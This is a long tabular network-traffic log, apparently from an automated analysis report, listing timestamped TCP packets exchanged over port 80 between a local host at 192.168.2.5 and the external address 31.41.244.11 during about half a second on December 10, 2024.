Dec 10, 2024 11:11:11.319308043 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.320350885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.320396900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.320417881 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.321453094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.321490049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.321521997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.321553946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.322505951 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.322669983 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.322710037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.323646069 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.323750973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.323795080 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.324754953 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.324794054 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.324878931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.325790882 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.325877905 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.325963020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.326001883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.326922894 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.327027082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.327079058 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.328053951 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.328119040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.328140020 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.329144955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.329189062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.329253912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.329849958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.330281973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.330400944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.330441952 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.331372976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.331470966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.331526041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.332468987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.332518101 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.332602024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.333564997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.333610058 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.333710909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.334697008 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.334739923 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.334785938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.334820986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.335783958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.335880041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.335927010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.336951971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.337032080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.337073088 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.338109016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.338156939 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.338191986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.339103937 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.339255095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.339298964 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.340177059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.340264082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.340307951 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.341330051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.341371059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.341401100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.341911077 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.342380047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.342418909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.342495918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.343480110 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.343521118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.343530893 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.344583035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.344634056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.344697952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.344736099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.345688105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.345823050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.345864058 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.346795082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.346915960 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.346954107 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.347940922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.347984076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.348012924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.349080086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.349128962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.349147081 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.349739075 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.350100040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.350215912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.350260019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.351208925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.351306915 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.351366043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.494142056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.494231939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.494317055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.494355917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.494641066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.494674921 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.494786024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.494818926 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.495780945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.495815039 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.495901108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.495934010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.496860981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.496893883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.497036934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.497067928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.497921944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.497963905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.498023987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.498070002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.499047041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.499265909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.499288082 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.499300003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.500140905 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.500245094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.500273943 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.500385046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.501255035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.501303911 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.501374960 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.501409054 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.502347946 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.502424002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.502486944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.502522945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.503448009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.503580093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.503619909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.504571915 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.504643917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.504708052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.504765987 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.505681038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.505714893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.505836964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.505906105 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.506779909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.506827116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.506906033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.506952047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.507852077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.507961988 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.507983923 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.507994890 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.508989096 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.509023905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.509217978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.509800911 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.510126114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.510166883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.510240078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.510292053 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.511245966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.511382103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.511420012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.512396097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.512646914 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.512685061 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.513453007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.513485909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.513638973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.513739109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.514503002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.514647007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.514669895 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.514679909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.516009092 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.516165018 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.516206026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.517136097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.517262936 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.517303944 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.518033028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.518126011 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.518137932 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.518167019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.518903017 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.518953085 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.519042015 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.519081116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.520055056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.520111084 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.520168066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.521081924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.521135092 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.521184921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.521348953 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.522161961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.522342920 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.522387981 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.523262024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.523340940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.523387909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.524410009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.524457932 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.524542093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.524727106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.525444984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.525497913 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.525583029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.525634050 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.526568890 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.526773930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.526810884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.527733088 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.527775049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.527844906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.528017044 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.528789997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.528831959 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.528934956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.529171944 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.529870033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.529939890 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.530073881 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.530116081 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.530982971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.531061888 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.531116962 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.531163931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.532593966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.532711029 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.532721043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.532748938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.533251047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.533293962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.533351898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.533402920 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.534321070 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.534396887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.534426928 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.534478903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.535408974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.535458088 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.535465956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.535531044 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.536539078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.536577940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.536591053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.536628962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.537614107 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.537658930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.537745953 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.537792921 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.538994074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.539061069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.539092064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.539134979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.540338039 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.540435076 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.540477991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.541237116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.541328907 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.541373968 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.542256117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.542366028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.542401075 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.543159008 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.543209076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.543380022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.543430090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.544215918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.544389963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.544395924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.544439077 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.545331955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.545452118 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.545454979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.545485020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.546415091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.546511889 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.546541929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.546595097 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.547528028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.547584057 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.547667027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.547714949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.548644066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.548697948 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.548832893 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.549129963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.549860001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.549959898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.549987078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.550146103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.550911903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.550965071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.551043034 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.551105022 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.551934004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.551978111 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.686117887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.686177969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.686201096 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.686254978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.686355114 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.686409950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.686537027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.686585903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.687469959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.687516928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.687530994 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.687670946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.688568115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.688637972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.688676119 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.688719034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.689708948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.689758062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.689990044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.690041065 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.690794945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.690886021 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.690968037 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.691015005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.691894054 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.691941023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.691998959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.692049026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.692992926 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.693062067 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.693063974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.693109035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.694094896 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.694135904 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.694261074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.694331884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.695256948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.695317030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.695322990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.695368052 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.696330070 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.696377993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.696396112 CET	80	49828	31.41.244.11	192.168.2.5
